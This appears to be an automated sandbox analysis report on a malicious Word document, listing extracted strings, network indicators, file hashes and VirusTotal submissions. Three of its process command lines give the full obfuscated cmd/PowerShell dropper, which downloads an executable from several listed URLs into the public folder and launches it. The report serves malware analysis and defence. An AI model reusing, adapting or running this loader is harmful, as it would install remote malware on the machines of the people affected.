Unicode based on Runtime Data
(WINWORD.EXE
)
Miriam Fixed
Unicode based on Runtime Data
(WINWORD.EXE
)
Modern No. 20
Unicode based on Runtime Data
(WINWORD.EXE
)
Mongolian Baiti
Unicode based on Runtime Data
(WINWORD.EXE
)
Monotype Corsiva
Unicode based on Runtime Data
(WINWORD.EXE
)
MoolBoran
Unicode based on Runtime Data
(WINWORD.EXE
)
MS Gothic
Unicode based on Runtime Data
(WINWORD.EXE
)
MS Mincho
Unicode based on Runtime Data
(WINWORD.EXE
)
MS Outlook
Unicode based on Runtime Data
(WINWORD.EXE
)
MS PGothic
Unicode based on Runtime Data
(WINWORD.EXE
)
MS PMincho
Unicode based on Runtime Data
(WINWORD.EXE
)
MS Reference Sans Serif
Unicode based on Runtime Data
(WINWORD.EXE
)
MS Reference Specialty
Unicode based on Runtime Data
(WINWORD.EXE
)
MSOBALLOON
Unicode based on Runtime Data
(WINWORD.EXE
)
MsoCommandBarPopup
Unicode based on Runtime Data
(WINWORD.EXE
)
MsoHelp10
Unicode based on Runtime Data
(WINWORD.EXE
)
mspim_wnd32
Unicode based on Runtime Data
(WINWORD.EXE
)
MT Extra
Unicode based on Runtime Data
(WINWORD.EXE
)
NetUICtrlNotifySink
Unicode based on Runtime Data
(WINWORD.EXE
)
NextUpdate
Unicode based on Runtime Data
(WINWORD.EXE
)
Niagara Engraved
Unicode based on Runtime Data
(WINWORD.EXE
)
Niagara Solid
Unicode based on Runtime Data
(WINWORD.EXE
)
OCR A Extended
Unicode based on Runtime Data
(WINWORD.EXE
)
OfficeTooltip
Unicode based on Runtime Data
(WINWORD.EXE
)
Old English Text MT
Unicode based on Runtime Data
(WINWORD.EXE
)
Options Version
Unicode based on Runtime Data
(WINWORD.EXE
)
Palace Script MT
Unicode based on Runtime Data
(WINWORD.EXE
)
Palatino Linotype
Unicode based on Runtime Data
(WINWORD.EXE
)
Parchment
Unicode based on Runtime Data
(WINWORD.EXE
)
Perpetua Titling MT
Unicode based on Runtime Data
(WINWORD.EXE
)
Plantagenet Cherokee
Unicode based on Runtime Data
(WINWORD.EXE
)
PMingLiU-ExtB
Unicode based on Runtime Data
(WINWORD.EXE
)
Poor Richard
Unicode based on Runtime Data
(WINWORD.EXE
)
ProductFiles
Unicode based on Runtime Data
(WINWORD.EXE
)
ProductNonBootFilesIntl_1033
Unicode based on Runtime Data
(WINWORD.EXE
)
ProxyBypass
Unicode based on Runtime Data
(WINWORD.EXE
)
Rage Italic
Unicode based on Runtime Data
(WINWORD.EXE
)
REListbox20W
Unicode based on Runtime Data
(WINWORD.EXE
)
Rockwell Condensed
Unicode based on Runtime Data
(WINWORD.EXE
)
Rockwell Extra Bold
Unicode based on Runtime Data
(WINWORD.EXE
)
Sakkal Majalla
Unicode based on Runtime Data
(WINWORD.EXE
)
Script MT Bold
Unicode based on Runtime Data
(WINWORD.EXE
)
Segoe Print
Unicode based on Runtime Data
(WINWORD.EXE
)
Segoe Script
Unicode based on Runtime Data
(WINWORD.EXE
)
Segoe UI Light
Unicode based on Runtime Data
(WINWORD.EXE
)
Segoe UI Semibold
Unicode based on Runtime Data
(WINWORD.EXE
)
Segoe UI Symbol
Unicode based on Runtime Data
(WINWORD.EXE
)
Shonar Bangla
Unicode based on Runtime Data
(WINWORD.EXE
)
Showcard Gothic
Unicode based on Runtime Data
(WINWORD.EXE
)
Simplified Arabic
Unicode based on Runtime Data
(WINWORD.EXE
)
Simplified Arabic Fixed
Unicode based on Runtime Data
(WINWORD.EXE
)
SimSun-ExtB
Unicode based on Runtime Data
(WINWORD.EXE
)
Snap ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
SpellingAndGrammarFiles_1033
Unicode based on Runtime Data
(WINWORD.EXE
)
SpellingAndGrammarFiles_1036
Unicode based on Runtime Data
(WINWORD.EXE
)
SpellingAndGrammarFiles_3082
Unicode based on Runtime Data
(WINWORD.EXE
)
Tempus Sans ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
Times New Roman
Unicode based on Runtime Data
(WINWORD.EXE
)
Traditional Arabic
Unicode based on Runtime Data
(WINWORD.EXE
)
Trebuchet MS
Unicode based on Runtime Data
(WINWORD.EXE
)
Tw Cen MT
Unicode based on Runtime Data
(WINWORD.EXE
)
Tw Cen MT Condensed
Unicode based on Runtime Data
(WINWORD.EXE
)
Tw Cen MT Condensed Extra Bold
Unicode based on Runtime Data
(WINWORD.EXE
)
UNCAsIntranet
Unicode based on Runtime Data
(WINWORD.EXE
)
VBAFiles
Unicode based on Runtime Data
(WINWORD.EXE
)
Viner Hand ITC
Unicode based on Runtime Data
(WINWORD.EXE
)
Vladimir Script
Unicode based on Runtime Data
(WINWORD.EXE
)
Webdings
Unicode based on Runtime Data
(WINWORD.EXE
)
Wide Latin
Unicode based on Runtime Data
(WINWORD.EXE
)
Wingdings
Unicode based on Runtime Data
(WINWORD.EXE
)
Wingdings 2
Unicode based on Runtime Data
(WINWORD.EXE
)
Wingdings 3
Unicode based on Runtime Data
(WINWORD.EXE
)
WordBibliographyFilesIntl_1033
Unicode based on Runtime Data
(WINWORD.EXE
)
WORDFiles
Unicode based on Runtime Data
(WINWORD.EXE
)
������
Ansi based on Runtime Data
(WINWORD.EXE
)
�������
Ansi based on Runtime Data
(WINWORD.EXE
)
�������������
Ansi based on Runtime Data
(WINWORD.EXE
)
����������������
Ansi based on Runtime Data
(WINWORD.EXE
)
�����������������
Ansi based on Runtime Data
(WINWORD.EXE
)
0_?c?_0___'_
Ansi based on Image Processing
(screen_8.png)
__________
Ansi based on Image Processing
(screen_8.png)
attempting
Ansi based on Image Processing
(screen_8.png)
FulIScr,,n
Ansi based on Image Processing
(screen_8.png)
Gr_d__n,t
Ansi based on Image Processing
(screen_8.png)
JJPe_et___nJ_'P___tI_n
Ansi based on Image Processing
(screen_8.png)
m_cr0c0ftw0rd
Ansi based on Image Processing
(screen_8.png)
M_crasaï¬
Ansi based on Image Processing
(screen_8.png)
Nav_9at_anPan,
Ansi based on Image Processing
(screen_8.png)
Pa9,W_dth
Ansi based on Image Processing
(screen_8.png)
Pag,Layaut
Ansi based on Image Processing
(screen_8.png)
Profected
Ansi based on Image Processing
(screen_8.png)
R,f,r,nc,_
Ansi based on Image Processing
(screen_8.png)
rc0mpat_b____m0de_
Ansi based on Image Processing
(screen_8.png)
S_Jeh,S_Je
Ansi based on Image Processing
(screen_8.png)
81.21.67.85
Ansi based on PCAP Processing
(PCAP)
ifcingenieria.cl
Ansi based on PCAP Processing
(PCAP)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Ansi based on PCAP Processing
(PCAP)
_?_?_?M_L_
Ansi based on Image Processing
(screen_0.png)
__?mJ____q_?,,?,??m??_?_v__,,,_,,
Ansi based on Image Processing
(screen_0.png)
m____qJ_,,
Ansi based on Image Processing
(screen_0.png)
AutoConfigURL
Unicode based on Runtime Data
(cosineinit.exe
)
DefaultConnectionSettings
Unicode based on Runtime Data
(cosineinit.exe
)
ProxyEnable
Unicode based on Runtime Data
(cosineinit.exe
)
ProxyOverride
Unicode based on Runtime Data
(cosineinit.exe
)
ProxyServer
Unicode based on Runtime Data
(cosineinit.exe
)
SavedLegacySettings
Unicode based on Runtime Data
(cosineinit.exe
)
WpadDecision
Unicode based on Runtime Data
(cosineinit.exe
)
WpadDecisionReason
Unicode based on Runtime Data
(cosineinit.exe
)
WpadDecisionTime
Unicode based on Runtime Data
(cosineinit.exe
)
WpadLastNetwork
Unicode based on Runtime Data
(cosineinit.exe
)
WpadNetworkName
Unicode based on Runtime Data
(cosineinit.exe
)
{09477111-DE61-43CD-A5AA-D9F7B489301F}
Unicode based on Runtime Data
(cosineinit.exe
)
����������
Ansi based on Runtime Data
(cosineinit.exe
)
�������������������������������������
Ansi based on Runtime Data
(cosineinit.exe
)
�������������������������������������������������������������
Ansi based on Runtime Data
(cosineinit.exe
)
�������������������������������������������������������������������������
Ansi based on Runtime Data
(cosineinit.exe
)
��������������������������������������������������������������������������������������
Ansi based on Runtime Data
(cosineinit.exe
)
Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=o^w&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=e^r&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um, 19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um,[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112),[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+',[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74),[CHA'+'R]39 -CReplace 9Um1'+'xA9Um,'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))
Ansi based on Process Commandline
(cmd.exe)
Cmd NiFNFLos YkMLGzjoazWTFMzoErTtjZAZ btnSkEoS & %comSpEc% %comSpEc% /V /c set %HvpurunsRmnvjbm%=zJlPRBwG&&set %pKskGkVXEDjT%=p&&set %dowlFKYHb%=ow&&set %GTHGTVYqDCTUTHV%=JNMwizhaTsz&&set %LYpRJHtwuOCsR%=!%pKskGkVXEDjT%!&&set %fFhDGzjnXmhYvNz%=hHRrroJFEpzXJ&&set %musHwkwosI%=er&&set %fBZnrWF%=!%dowlFKYHb%!&&set %oXmdLMdsYfUoN%=s&&set %lhmbWskWwNVkUzp%=oQllFASCBHr&&set %XwERnXf%=he&&set %mGqOdYnIP%=ll&&!%LYpRJHtwuOCsR%!!%fBZnrWF%!!%musHwkwosI%!!%oXmdLMdsYfUoN%!!%XwERnXf%!!%mGqOdYnIP%! ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um, 19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um,[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112),[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+',[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74),[CHA'+'R]39 -CReplace 9Um1'+'xA9Um,'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))
Ansi based on Process Commandline
(00045852-00002952)
powershell ". ( $psHOme[4]+$Pshome[30]+'x') ( ((' ((9Um1xAnsada9Um+9'+'Ums9Um+9Umd = &9Um+9Um(O9Um+9UmQJn9Um+9UmO9Um+9UmQJ+OQJ9Um+9UmeOQJ+OQ9Um+9UmJw-ob9Um+9Umj9Um+9UmecOQJ+OQ9Um+9UmJ9Um+9UmtOQJ9Um+9Um) ran9Um+9Umdom;9Um+9Um'+'1x9Um+9Um'+'A9Um+9UmYY9Um+9UmU 9Um+9Um= .'+'9Um+9Um(9U'+'m+9UmO9Um+9UmQJneO9Um+9UmQJ+OQJwOQ9Um+9UmJ+OQJ-o9Um+9Umbject9Um+9UmO9Um+9UmQJ) Syst9Um+9Umem9Um+9Um.Net.W9Um+9UmebClient;'+'1xA9Um+9UmNS9Um+9UmB = 19Um+9Umx9Um+9U'+'mAn9Um+9Um'+'sadas9Um+9Umd.next(9Um+9Um10009Um+9Um0, 9'+'Um+9Um29Um+9Um82133'+');1xA9Um+9UmADCX9Um+9Um = OQJ9Um+9'+'Um 9Um+9Um http9Um+9Um://i9Um+9Umfc9Um+9Umingen9Um+9Umier9Um+9Umia.9Um+9Umc9Um+9Uml/9Um+9Um79Um+9Um'+'6j9Um+9Um49Um+'+'9Umq9Um+9Umo'+'/@9Um+'+'9Umht9Um+9Umtp9Um+9Um:9Um+9Um//9Um+9Umk9Um+9Ume9Um+9Umith9Um+9Umda9Um+9Umley.co.u9Um+9Umk/wp9Um+9Ump-app/R9Um+9Umaoz/@h9Um+9Umttp:/9Um+9Um/is9Um+9Umchka.com/TQA9Um+9Um59Um+9Um4/@h9Um+9Umttp:/9Um+9Um/9Um+9Umda9Um+9Umt9Um+9Um'+'o9Um+9Ums.com.tw'+'/i9Um+9Umm9Um+9Umag9Um+9Ume/pr9Um+9Umo9Um+9U'+'mdu9Um+9Umc9Um+9U'+'mt9Um+9Um/pic_9Um+9Ums/Jnut9Um+9Um/@9Um+9Umht9Um+9Umtp://ki9'+'Um+9Ume'+'f9Um+9Umer9Um+9Umne9Um+9Umt.eu/D9Um+9Um505IR9Um+9Um1/O9Um+9UmQJ.9Um+9UmS9Um+9Umplit(9Um+9UmOQ9Um+9UmJ@O9Um+9UmQJ);1xASDC'+' 9Um+9Um= 9Um+9Um19Um+9Umx9Um+9UmA9Um+9Ume9Um+9Umnv:9Um+9Umpu9Um+9Umbl9Um+9Umi'+'c + O9'+'Um+9UmQ9'+'Um+9UmJ19xOQJ 9Um+9Um+ 1xA9Um+9UmNSB 9Um+9Um+ 9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um, 19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um,[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112),[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+',[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74),[CHA'+'R]39 -CReplace 9Um1'+'xA9Um,'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))
Ansi based on Process Commandline
(powershell.exe)
Extracted Files
-
Informative 7
-
-
02vPLpWc.LNK
- Size
- 453B (453 bytes)
- Type
- lnk
- Description
- MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu May 17 07:53:26 2018, mtime=Thu May 17 07:53:26 2018, atime=Thu May 17 07:53:56 2018, length=167424, window=hide
- Runtime Process
- WINWORD.EXE (PID: 3952)
- MD5
-
17519994ad3507e805c5160fbef7177e
- SHA1
-
6e58116e050728aef693a7de7721e1b86768c737
- SHA256
-
74e2b8b43e5a59f8982c454d3e0270f9061dbc333062913b454af50411dab922
-
~$Normal.dotm
- Size
- 162B (162 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3952)
- MD5
-
f66005724ec4875f23c93e180ad80b21
- SHA1
-
b7712c7bf45c6a0d1e6ac5262a9761343c482aab
- SHA256
-
09f6fedfba136efd103967316ca3de3e41ae76abafb421a2d93e43b9e52d3988
-
TY98LM19OS4MQAMZCOLL.temp
- Size
- 7.8KiB (8016 bytes)
- Type
- data
- Runtime Process
- powershell.exe (PID: 3800)
- MD5
-
9c77e0a477d4190bd8bcf73a97c939ca
- SHA1
-
d616c1115bd1aa171593a71b577f7e66f52c5de8
- SHA256
-
b6071f21ddb1a71d1ed78c10cd99868190f201208cf9b3c106e2b4d50185e96f
-
index.dat
- Size
- 145B (145 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3952)
- MD5
-
e212257657d986f41591f6e291667807
- SHA1
-
748c05ddec62cea8a3f7cac350ad15c7a9de55f4
- SHA256
-
d662f8290ac866a0c1d8eea293715d2cd6f2a6fe19799cf8e39a23a0eeea5bdd
-
~WRS{3B257DFB-1EFD-4832-9438-0BDD960DE59D}.tmp
- Size
- 1KiB (1024 bytes)
- Type
- unknown
- Description
- FoxPro FPT, blocks size 0, next free block index 218103808, 1st used item "\375"
- Runtime Process
- WINWORD.EXE (PID: 3952)
- MD5
-
5d4d94ee7e06bbb0af9584119797b23a
- SHA1
-
dbb111419c704f116efa8e72471dd83e86e49677
- SHA256
-
4826c0d860af884d3343ca6460b0006a7a2ce7dbccc4d743208585d997cc5fd1
-
166520.exe
- Size
- 232KiB (237568 bytes)
- Type
- peexe executable
- Description
- PE32 executable (GUI) Intel 80386, for MS Windows
- Runtime Process
- 166520.exe (PID: 2132)
- MD5
-
60afb4e8d54d4703e5aa0245117f24b8
- SHA1
-
e7d75242d84ca9ff5ba124e602799d7501ca7a52
- SHA256
-
a8c77ca77f57a21aca5d754f37ba4b053b59e57e3d99b1fd99b7fd4d29a5ff98
-
~$vPLpWc.doc
- Size
- 162B (162 bytes)
- Type
- data
- Runtime Process
- WINWORD.EXE (PID: 3952)
- MD5
-
f66005724ec4875f23c93e180ad80b21
- SHA1
-
b7712c7bf45c6a0d1e6ac5262a9761343c482aab
- SHA256
-
09f6fedfba136efd103967316ca3de3e41ae76abafb421a2d93e43b9e52d3988
-
Notifications
-
Runtime
- Added comment to Virus Total report
- Extracted file "166520.exe" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/a8c77ca77f57a21aca5d754f37ba4b053b59e57e3d99b1fd99b7fd4d29a5ff98/analysis/1526544125/")
- Extracted file "~$vPLpWc.doc" was unknown to VirusTotal, submitted file for scanning (Permalink: "https://www.virustotal.com/file/09f6fedfba136efd103967316ca3de3e41ae76abafb421a2d93e43b9e52d3988/analysis/1526544124/")
- Not all sources for indicator ID "api-51" are available in the report
- Not all sources for indicator ID "api-55" are available in the report
- Not all sources for indicator ID "api-70" are available in the report
- Not all sources for indicator ID "hooks-8" are available in the report
- Not all sources for indicator ID "mutant-0" are available in the report
Community
There are no community comments.
You must be logged in to submit a comment.